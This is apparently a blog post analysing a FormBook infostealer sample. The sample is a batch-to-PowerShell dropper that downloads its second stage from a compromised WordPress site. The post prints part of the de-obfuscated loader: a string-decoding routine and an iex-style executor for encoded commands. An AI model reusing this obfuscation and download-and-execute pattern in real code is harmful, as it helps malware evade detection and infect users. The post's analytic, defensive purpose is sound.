FormBook Malware - The Uninvited Guest of WordPress
Introduction
Hey everyone 🙏, today we’ll be exploring FormBook
, an infostealer malware 🤖 that has been circulating since 2016, offering its malicious services on hacking forums as Malware as a Service (MaaS). Recently, I stumbled upon a fresh sample named rCheq0004783.bat
on Malware Bazaar , dated May 15, 2024
. It’s obfuscated, but after some digging, it’s just another FormBook variant which is executed after multi-stages of de-obfuscation.
What’s interesting is how this sample hides one of its payloads on a vulnerable WordPress website
. Seems like the malware found a new hideout, Sneaky ? 🥸
Keep reading as I dig into the analysis, revealing FormBook’s newest tactics.
Analysis
Download Sample from : Malware Bazaar , VirusTotal
The sample is obfuscated and looks like total gibberish at first glance, except for the first line, which reveals the batch script executing PowerShell in hidden mode. See [Figure - FormBook First Stage].
Let’s try to de-obfuscate this mess. I’ll copy and paste the obfuscated script into a new file, adding line breaks to make it look cleaner. I attempted replacing all semicolons with \n
characters, but the output wasn’t very clear because some of the obfuscated strings contain semicolons. With no other options left, I went through each line and corrected the syntax, See below code snippet.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
$Konvolutter = 1;
$premonopolises='Su';
$premonopolises+='bstrin';
$premonopolises+='g';
Function printermanualer($Deferrals){
$Coadmires=$Deferrals.Length-$Konvolutter;
For($Imposante124=2;$Imposante124 -lt $Coadmires;$Imposante124+=3){
$Diskenspringerens+=$Deferrals.$premonopolises.Invoke( $Imposante124, $Konvolutter);
}
$Diskenspringerens;
}
function Investeringsoversigterne($Entr){
.($Expecter) ($Entr);
}
$Oreopithecus=printermanualer 'OcMEpoClzFei Gl lReaOm/M,5 ,.La0Ba Bo(AlW RiHinAfd ,oFrwZasAn eN .TAr P,1Cl0 H.Ev0 O;Bl NWFoi en A6 B4 H;Wi ,yx M6e,4 u;In grrG,v :.m1.o2On1Br. .0R,)Nu ,GFoeFucSuk.eost/ D2Sn0.l1Ek0 z0Bi1 ,0,y1 O rFEfiDrrSie.efA o UxA,/Sp1S 2.e1Pe.S,0Ou ';
$Havfiskers=printermanualer 'BeUOlsI eEir ,-RaA ,gL.eSpnFitGl ';
# ... (OMMITTING FEW LINES)
# ... (OMMITTING FEW LINES)
# ... (OMMITTING FEW LINES)
$Afglatningers=268444;
$neatify=27864;
Investeringsoversigterne (printermanualer ' $ ngM,l SoTabobaL lI :S,SgryGolAdlSyeA,p .sQei Cs,a He= U TeGu,eT t B- .CFiodrn.ct MeSunHetUn C,$PlSFlnh oH,b.abSpeTrr ns,o ');
# ... (OMMITTING FEW LINES)
Investeringsoversigterne (printermanualer 'An$BegHolDioW.b na dl ,:Aaa,alpalSkrA.oQuu unChd,a=mi$U,S .eIbl v efU,o,nrL a g,et.eeAfn.lsUn.UnsU,uS.bGas.otsor GiDenmig .(,n$.iAExfS,g,llSta UtBanCuiHynTrgTreShrIns,o,r $ NnDre SaBotPaiBdfB ySi)g. ');
Investeringsoversigterne $allround;
Its better than before, but still not readable. Lets decode this step by step. In the above code snippet, there are two functions: printermanualer
and Investeringsoversigterne
. The function printermanualer
accepts a string input, performs some operations on it, and then returns a string. It appears that some decoding is taking place within this function. Let’s refer to this function as decode_str
. I will rename all occurence of string printermanualer
to decode_str
. The other function Investeringsoversigterne
executes input string, using keyword iex
.
Let’s run the decode_str
function in a PowerShell window to decode all strings present in the sample. See [Figure - decode_str 1 ]
Using decode_str
function, I can now decode those gibberish strings found throughout the script. See [Figure - decode_str 2]
Decoding the first variable $Oreopithecus
revealed a user-agent string. This is a clear indication, that the script will likely perform HTTP communications, probably to download additional payloads.
After decoding all the strings in the same manner, I discovered a URL that stores the second-stage payload for this malware. This URL hosts a vulnerable WordPress website. See [Figure - WordPress URL].
Using PowerShell’s System.Net.WebClient malware downloads the contents of the WordPress URL. See [Figure - WebClient]
The downloaded file is cleaned in multiple steps as shows in [Figure - Cleaning Nasard] before execution. Figure - Cleaning Nasard
I have created this CyberChef recipe which takes downloaded file as input and provides cleaned second-stage payload. See [Figure - CyberChef Recipe]
Final Note
Alright, folks, there are a lot of FormBook malware analysis reports out there. My aim in this article was to shed light on how threat actors are abusing never-ending vulnerable WordPress websites.
In this case, the threat actor exploited a vulnerable WordPress plugin, leading to arbitrary file upload. Please refer to https://wpscan.com/vulnerability/a8350890-e6d4-4b04-a158-2b0ee3748e65/ for more information. Consequently, they utilized this WordPress website as a payload downloader service.